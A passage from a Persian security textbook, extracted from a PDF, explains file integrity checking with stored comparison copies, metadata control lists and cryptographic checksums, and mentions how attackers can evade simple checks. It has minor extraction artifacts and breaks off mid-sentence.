‫ﺭﻭﺵ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺑﺮﺍﻱ ﻣﻘﺎﻳﺴﻪ‪ ،‬ﺑﻪ ﻣﻌﻨﻲ ﺧﻮﺍﻧﺪﻥ ﻛﺎﻣﻞ ﻫﺮ ﺩﻭﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺻﻠﻲ ﻭ ﻧﺴﺨﺔ ﺛﺎﻧﻮﻳﻪ ﺑﺼﻮﺭﺕ ﺑﺎﻳﺖ ﺑﻪ ﺑﺎﻳﺖ ﺑﺮﺍﻱ ﻫﺮ ﺑـﺎﺭ‬
‫ﺑﺮﺭﺳﻲ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﻭ ﺍﻟﺒﺘﻪ ﺍﺯ ﻧﺴﺨﺔ ﺛﺎﻧﻮﻳﻪ ﻧﻴﺰ ﺑﺎﻳﺪ ﺩﺭ ﻣﺤﻞ ﺍﻣﻨﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ‪.‬‬
‫ﺣﺘﻲ ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻦ ﻣﻌﺎﻳﺐ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺵ ﻧﺴﺨﻪﻫﺎﻱ ﻣﻘﺎﻳﺴﻪﺍﻱ ﻳﻚ ﻣﺰﻳﺖ ﻭﻳﮋﻩ ﺩﺍﺭﺩ ﻭ ﺁﻥ ﺍﻳﻨﻜـﻪ ﺍﮔـﺮ ﺗﻐﻴﻴـﺮ ﻏﻴﺮﻣﺠـﺎﺯﻱ ﻣـﺸﺎﻫﺪﻩ‬
‫ﻛﺮﺩﻳﺪ‪ ،‬ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻧﺴﺨﺔ ﺗﻐﻴﻴﺮﻳﺎﻓﺘﻪ ﺭﺍ ﺑﺎ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﺁﻥ ﺟﺎﻳﮕﺰﻳﻦ ﻛﻨﻴﺪ ﻭ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴـﺐ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺑـﻪ ﻭﺿـﻌﻴﺖ ﻋـﺎﺩﻱ ﺑـﺎﺯ‬
‫ﮔﺮﺩﺍﻧﻴﺪ‪ .‬ﺍﺯ ﺍﻳﻦ ﻧﺴﺨﻪﻫﺎ ‪ -‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺑﻌﺪﻱ ﺗﻮﺻﻴﺢ ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ ‪ -‬ﻣﻲﺗﻮﺍﻥ ﺑﻄـﻮﺭ ﻣﺤﻠـﻲ‪ ،‬ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﻳـﺎ‬
‫ﺭﻭﻱ ﺷﺒﻜﻪ ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ‪.‬‬

‫ﻧﺴﺨﻪﻫﺎﻱ ﻣﺤﻠﻲ‬
‫ﻳﻚ ﺭﻭﺵ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻧﺴﺨﻪﻫﺎﻱ ﻣﻘﺎﻳﺴﻪﺍﻱ‪ ،‬ﮔﺬﺍﺷﺘﻦ ﺁﻧﻬﺎ ﺭﻭﻱ ﺩﻳﺴﻜﻲ ﺩﻳﮕﺮ ﺧﺼﻮﺻﹰﺎ ﺭﺳﺎﻧﻪﻫـﺎﻱ ﻗﺎﺑـﻞ ﺣﻤـﻞ ﺍﺳـﺖ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﮔﻔﺘﻪﺍﻧﺪ ﻛﻪ ﺑﺎ ﺫﺧﻴﺮﺓ ﻓﺎﻳﻠﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺳﻴﺴﺘﻢ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺣﻤﻞ ﺗﻮﺍﻧـﺴﺘﻪﺍﻧـﺪ ﻳﮑﭙـﺎﺭﭼﮕﻲ ﻭ ﺻـﺤﺖ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ‬
‫ﺑﺮﻗﺮﺍﺭ ﺳﺎﺯﻧﺪ‪ ٣٣٢.‬ﺍﮔﺮ ﺩﺭ ﻣﻮﺭﺩ ﻓﺎﻳﻞ ﺧﺎﺻﻲ ﺷﺒﻬﻪﺍﻱ ﺑﻮﺟﻮﺩ ﺁﻳﺪ‪ ،‬ﺩﻳﺴﻚ ﻣﺮﺑﻮﻃﻪ ﺩﺭ ﺩﻳﺴﮏﮔﺮﺩﺍﻥ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ‪ mount ،‬ﻣﻲﺷـﻮﺩ‬
‫ﻭ ﻋﻤﻞ ﻣﻘﺎﻳﺴﻪ ﺍﻧﺠﺎﻡ ﻣﻲﭘﺬﻳﺮﺩ‪ .‬ﺍﮔﺮ ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺍﻳﻦ ﺩﻳﺴﻜﻬﺎ ﺩﻗﺖ ﻛﺎﻓﻲ ﺑﻪ ﺧﺮﺝ ﺩﻫﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ ﻣﺰﻳـﺖ ﺑـﺎ ﺍﺭﺯﺵ ﺑﻬـﺮﻩﻣﻨـﺪ‬
‫ﺷﻮﻳﺪ ﻛﻪ ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺭ ﺍﺛﺮ ﻳﻚ ﺣﻤﻠﻪ ﻳﺎ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﺩﺳﺘﻜﺎﺭﻱ ﺷﻮﺩ ﻳﻚ ﻧﺴﺨﺔ ﻛﺎﻣﻞ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﺮﺍﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺭﺍ ﺩﺭ‬
‫ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ‪ .‬ﺍﻧﺠﺎﻡ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻣﻨﻈﻢ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺣﻤﻞ ﻳﺎ ﻳﻜﺒﺎﺭ ﻧﻮﺷﺘﻨﻲ ﻣﺜﻞ ﻧﻮﺍﺭﻫﺎ ﻭ ﺩﻳـﺴﻜﻬﺎﻱ ﻓـﺸﺮﺩﻩ ﻧﻴـﺰ ﺍﺯ ﻫﻤـﻴﻦ‬
‫ﻣﺰﺍﻳﺎ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪.‬‬
‫ﻳﻚ ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﻧﺴﺨﻪﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ‪ ،‬ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺩﺭ ﻗﺴﻤﺖ ﺩﻳﮕﺮﻱ ﺍﺯ ﺩﻳﺴﻚ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻦ ﻧـﺴﺨﻪ‬
‫ﺭﺍ ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﻭ ﻳﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ ﺗﺎ ﺣﺠﻢ ﺩﻳﺴﻚ ﻣﺼﺮﻓﻲ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻴﺪ ﻭ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺍﺳـﺘﺮﺍﻕﺳـﻤﻊ ﻧﻴـﺰ ﺍﺯ ﺁﻥ ﻣﺤﺎﻓﻈـﺖ ﻧﻤﺎﻳﻴـﺪ‪.‬‬
‫ﺍﺷﻜﺎﻝ ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻣﻘﺎﻳﺴﻪ‪ ،‬ﺑﻪ ﭘﺮﺩﺍﺯﺵ ﺍﺿﺎﻓﻲ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻳﻜﺒﺎﺭ ﺩﺭ ﺭﻭﺯ )ﻳـﺎ ﺑـﻴﺶ ﺍﺯ‬
‫ﺁﻥ( ﺍﻳﻦ ﻣﻘﺎﻳﺴﻪ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﻓﻌﺎﻟﻴﺖ ﺍﺿﺎﻓﻪ ﺁﺛﺎﺭ ﺟﺎﻧﺒﻲ ﺯﻳﺎﺩﻱ ﺑﻪ ﺑـﺎﺭ ﺑﻴـﺎﻭﺭﺩ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﻧﻤـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺑﺮﻧﺎﻣـﺔ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺎ ﺍﻳﻦ ﺭﻭﺵ ﻣﺤﺎﻓﻈﺖ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ‪.‬‬

‫ﻧﺴﺨﻪﻫﺎﻱ ﺭﺍﻩ ﺩﻭﺭ‬


‫ﺭﻭﺵ ﺳﻮﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﻣﻘﺎﻳﺴﻪﺍﻱ‪ ،‬ﺫﺧﻴﺮﺓ ﺁﻧﻬﺎ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﺍﺳﺖ ﺑﻪ ﻧﺤﻮﻱ ﻛﻪ ﺑﺪﻭﻥ ﺣﻀﻮﺭ ﻓﻴﺰﻳﻜـﻲ‬
‫ﺩﺭ ﻣﺤﻞ ﻭ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻧﻤﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺩﺭ ﻳﻚ ‪ partition‬ﺍﺯ ﺩﻳﺴﻚ‬

‫‪ ۳۳۱‬ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑﻮﻁ ﺑﻪ ﺣﻖ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ‪ -‬ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎ ‪ -‬ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﺓ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺭﺍ ﻧﻤﻲﺩﻫﻨﺪ‪.‬‬
‫‪ ۳۳۲‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻳﻦ ﺗﻮﺻﻴﻒ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﺩﻳﺴﻚ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ firewire‬ﺧﺎﺭﺟﻲ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫‪٤٢٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻳﻤﻦ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻭ ﺁﻥ ‪ partition‬ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ NFS‬ﻳﺎ ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﻣﺸﺎﺑﻪ‪ ،‬ﺑﺼﻮﺭﺕ ﻓﻘﻂﺧﻮﺍﻧﺪﻧﻲ ﺑـﻪﺍﺷـﺘﺮﺍﻙ‬
‫ﺑﮕﺬﺍﺭﻳﺪ‪ .‬ﭘﺲ ﺍﺯ ﺁﻥ ﺗﻤﺎﻡ ﻣﺸﺘﺮﻳﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻥ ‪ partition‬ﺭﺍ ‪ mount‬ﻛﻨﻨﺪ ﻭ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺑﺮﺍﻱ ﺁﺯﻣﻮﻥ ﺟﺎﻣﻌﻴﺖ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺍﻧﺠﺎﻡ ﻣﻘﺎﻳﺴﻪ ﺍﺯ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ ﺭﺍﻩ ﺩﻭﺭ ﺑﺮﺩﺍﺷـﺘﻪ‬
‫ﻣﺤﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺍﺻﻠ ﹺ‬
‫ﻣﻲﺷﻮﻧﺪ ﻭ ﻧﻪ ﺍﺯ ﺩﻳﺴﻚ ﻣﺤﻠﻲ‪ .‬ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻥ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻃﻮﺭﻱ ﺩﺳﺘﻜﺎﺭﻱ ﻛﻨﺪ ﻛﻪ ﻫﻴﭻ ﺗﻐﻴﻴﺮﻱ ﮔﺰﺍﺭﺵ ﻧﺸﻮﺩ‪.‬‬
‫ﻳﻚ ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻣﻘﺎﻳﺴﻪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ ﺷﺒﻜﻪ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ "‪ "rdist‬ﺍﺳﺖ‪ .‬ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ؛ ﺑﻠﻜﻪ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎﻱ ﻣﺸﺘﺮﻙ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﺎ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺻـﻠﻲ ﺧـﻮﺩ ﻣﻘﺎﻳـﺴﻪ‬
‫ﺷﻮﻧﺪ‪.‬‬

‫ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻭ ﻓﺮﺍﺩﺍﺩﻩﻫﺎ‬


‫ﻞ ﺣﻴﺎﺗﻲ ﻭ ﺍﻧﺠﺎﻡ ﻣﻘﺎﻳﺴﺔ ﺑﺎﻳﺖ ﺑﻪ ﺑﺎﻳﺖ ﺑﺴﻴﺎﺭ ﭘﺮﻫﺰﻳﻨﻪ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻧـﺴﺨﻪﻫـﺎ ﻓـﻀﺎﻱ ﺯﻳـﺎﺩﻱ ﺍﺯ‬
‫ﺫﺧﻴﺮﺓ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻫﺮ ﻓﺎﻳ ﹺ‬
‫ﺩﻳﺴﻚ ﻻﺯﻡ ﺍﺳﺖ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺍﮔﺮ ﻣﻘﺎﻳﺴﻪ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ‪ ،‬ﻫﺮ ﺑﺎﺭ ﻣﻘﺎﻳﺴﻪ ﺳﺮﺑﺎﺭ ﺯﻳﺎﺩﻱ ﺭﻭﻱ ﺩﻳﺴﻚ ﻭ ﺷﺒﻜﻪ ﻣﻲﮔﺬﺍﺭﺩ‪.‬‬
‫ﻳﻚ ﺭﻭﺵ ﻛﺎﺭﺁﺗﺮ‪ ،‬ﺫﺧﻴﺮﺓ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﻣﻬﻢ ﻫﺮ ﻓﺎﻳﻞ ﻳﺎ ﺷﺎﺧﻪ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻣﻘﺎﻳـﺴﻪ‪ ،‬ﺍﻳـﻦ ﺧﻼﺻـﻪﻫـﺎ‬
‫ﻣﺠﺪﺩﹰﺍ ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﻧﺪ ﻭ ﺑﺎ ﻣﻘﺪﺍﺭ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﮔﺮﺩﻧﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﺧﻼﺻﻪﻫﺎ ﺟﺎﻣﻊ ﻭ ﺍﺯ ﺣﺠﻢ ﻛﻤﺘﺮﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ‪ ،‬ﺑـﻪ ﻭﺿـﻮﺡ‬
‫ﻳﻚ ﺭﻭﺵ ﻛﺎﺭﺁﺗﺮ ﺑﺮﺍﻱ ﻣﻘﺎﻳﺴﻪ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬
‫ﺍﻳﻦ ﺭﻭﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﺪ ﻛﻪ ﺑﺎ ﻣﻘﺎﻳﺴﺔ ﺳﺎﺩﻩ ﻧﻤﻲﺗﻮﺍﻥ ﻣﺘﻮﺟﻪ ﺁﻧﻬﺎ ﺷﺪ‪ .‬ﻧﺴﺨﻪﻫـﺎﻱ ﻣﻘﺎﻳـﺴﻪﺍﻱ ﺗﻨﻬـﺎ ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ‬
‫ﻣﺤﺘﻮﻳﺎﺕ ﻓﺎﻳﻞ ﺭﺍ ﺗﺸﺨﻴﺺ ﻣﻲﺩﻫﻨﺪ ﻭ ﻗﺎﺑﻠﻴﺖ ﺗﺸﺨﻴﺺ ﺗﻐﻴﻴﺮ ﺩﺭ ﻓﺮﺍﺩﺍﺩﻩﻫﺎﻳﻲ ﻣﺎﻧﻨﺪ ﻣﺎﻟﻚ ﻓﺎﻳـﻞ‪ ،‬ﻭﺿـﻌﻴﺘﻬﺎﻱ ﺣﻔـﺎﻇﺘﻲ‪ ،٣٣٣‬ﻳـﺎ ﺯﻣـﺎﻥ‬
‫ﺗﻐﻴﻴﺮ ﻓﺎﻳﻞ ﺭﺍ ﻧﺪﺍﺭﻧﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﻣﻬﻤﺘﺮ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺩﺭﻭﻥ ﻓﺎﻳﻞ ﻫﺴﺘﻨﺪ؛ ﭼﺮﺍﻛﻪ ﺍﮔﺮ ﺩﺭ ﻣﺎﻟﻚ ﻳﺎ ﺑﻴﺘﻬﺎﻱ ﻣﺤـﺎﻓﻈﺘﻲ ﻓﺎﻳﻠﻬـﺎ‬
‫ﻳﺎ ﺷﺎﺧﻪﻫﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺷﺘﺒﺎﻩ ﺭﺥ ﺩﻫﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﺎﺟﻌﻪ ﺑﻪ ﺑﺎﺭ ﺁﻳﺪ‪ .‬ﺳﺎﺩﻩﺗﺮﻳﻦ ﺷﻜﻞ ﻛﻨﺘﺮﻝ‪ ،‬ﻓﻬﺮﺳﺖ ﻛﺮﺩﻥ ﻓﺎﻳﻠﻬﺎ ﻭ ﺻـﻔﺎﺕ‪ ٣٣٤‬ﺁﻧﻬـﺎ ﺩﺭ‬
‫ﻻ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ‪ ،‬ﻧﮕﻬﺪﺍﺭﻱ ﺗﻤﺎﻡ ﺷﺎﺧﻪﻫﺎﻱ‬ ‫ﻳﻚ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﻭ ﻣﻘﺎﻳﺴﺔ ﻧﺘﻴﺠﻪ ﺑﺎ ﻳﻚ ﻧﺴﺨﺔ ﺍﺯ ﭘﻴﺶ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺎﻻﺗﺮ ﺁﻥ ﻧﻴﺰ ﻻﺯﻡ ﺍﺳﺖ‪.‬‬

‫ﺳﺮﺟﻤﻊﻫﺎ ﻭ ﺍﻣﻀﺎﻫﺎ‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﺎ ﻛﻤﻲ ﺗﻼﺵ ﻣﻲﺗﻮﺍﻥ ﻓﻬﺮﺳﺘﻬﺎﻱ ﺳﺎﺩﺓ ﻛﻨﺘﺮﻟﻲ ﺭﺍ ﻣﻐﻠﻮﺏ ﻛﺮﺩ‪ .‬ﻣـﻲﺗـﻮﺍﻥ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ ﻃـﻮﺭﻱ ﺩﺳـﺘﻜﺎﺭﻱ ﻛـﺮﺩ ﻛـﻪ ﺗﻐﻴﻴـﺮﺍﺕ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻴﺪ ﺗﺸﺨﻴﺺ ﺩﺍﺩﻩ ﻧﺸﻮﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻧﻤﻮﻧﻪ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﻳﻚ ﻓﺎﻳﻞ ﻣﻲﺗـﻮﺍﻥ ﺑـﺎ ﺩﺍﻧـﺴﺘﻦ ﺑﻠـﻮﻙ ﻣـﻮﺭﺩ ﻧﻈـﺮ‪،‬‬
‫ﻣﺴﺘﻘﻴﻤﹰﺎ ﻭ ﻣﺴﺘﻘﻞ ﺍﺯ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ‪ ،‬ﺭﻭﻱ ﺩﻳﺴﻚ ﻧﻮﺷﺖ‪ .‬ﭼﻮﻥ ﺗﻐﻴﻴﺮ ﺍﺯ ﻃﺮﻳﻖ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺍﻧﺠﺎﻡ ﻧﮕﺮﻓﺘﻪ ﺍﺳﺖ‪ ،‬ﻫﻴﭻ ﻳﻚ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻣﺮﺑﻮﻁ ﺑﻪ ﺯﻣﺎﻥ ﺗﻐﻴﻴﺮ ﻓﺎﻳﻞ ﻋﻮﺽ ﻧﻤﻲﺷﻮﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻧﻤﻮﻧﻪﺍﻱ ﺩﻳﮕﺮ‪ ،‬ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺎﻋﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻪ ﺁﺧـﺮﻳﻦ ﺯﻣـﺎﻥ ﻣﺠـﺎﺯ ﺑـﺮﺍﻱ‬
‫ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺸﺮﻭﻉ ﺑﺒﺮﺩ‪ ،‬ﻓﺎﻳﻞ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺳﺎﻋﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﺑﻪ ﺯﻣﺎﻥ ﺍﻭﻟﻴﻪ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎ ﺍﻣﻀﺎ ﺍﻳﺠﺎﺩ ﻛﺮﺩ ﻭ ﺍﻣﻀﺎﻫﺎ ﺭﺍ ﺑﺎ ﻫﻢ ﻣﻘﺎﻳﺴﻪ ﻧﻤﻮﺩ‪ .‬ﻳﻚ ﺍﻣﻀﺎﻱ ﺧﻮﺏ ﺑﺎﻳﺪ ﺑﻪ ﺗﻚ ﺗﻚ‬
‫ﺑﻴﺘﻬﺎﻱ ﻓﺎﻳﻞ ﺑﺴﺘﮕﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻭ ﻳﻚ ﻣﻬﺎﺟﻢ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﺪ ﻓﺎﻳﻞ ﺩﻳﮕـﺮﻱ ﺑـﺎ ﻫﻤـﺎﻥ ﺍﻣـﻀﺎ ﺗﻮﻟﻴـﺪ ﻛﻨـﺪ‪ .‬ﺍﻳـﻦ ﻧﻴﺎﺯﻣﻨـﺪﻳﻬﺎ ﺻـﻼﺣﻴﺖ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺳﺎﺩﻩ ﺳﺮﺟﻤﻌﮕﻴﺮﻱ )ﻣﺎﻧﻨﺪ ‪ (CRC‬ﺭﺍ ﺯﻳﺮ ﺳﺆﺍﻝ ﻣﻲﺑﺮﻧﺪ‪ ،‬ﻭﻟﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺁﻭﺭﺩ‪.‬‬
‫ﻻ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭼﻨﺪ ﻧﻮﻉ ﺧﻼﺻﺔ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﻫﺮ ﻓﺎﻳـﻞ ﻭ ﻓـﺮﺍﺩﺍﺩﻩﻫـﺎﻳﺶ‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺧﻮﺏ ﺑﺮﺭﺳﻲ ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﻓﺎﻳﻠﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ‪ .‬ﻭﻗﺘﻲ ﺍﺯ ﻳﻚ ﻧﺴﺨﺔ ﺳﺎﻟﻢ ﺑﺮﺍﻱ ﺗﻮﻟﻴﺪ ﺍﻣﻀﺎﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ ﻭ ﺍﺯ ﺍﻣﻀﺎﻫﺎ ﺩﺭ ﻣﺤﻠﻲ ﺍﻣﻦ )ﻣـﺜ ﹰ‬
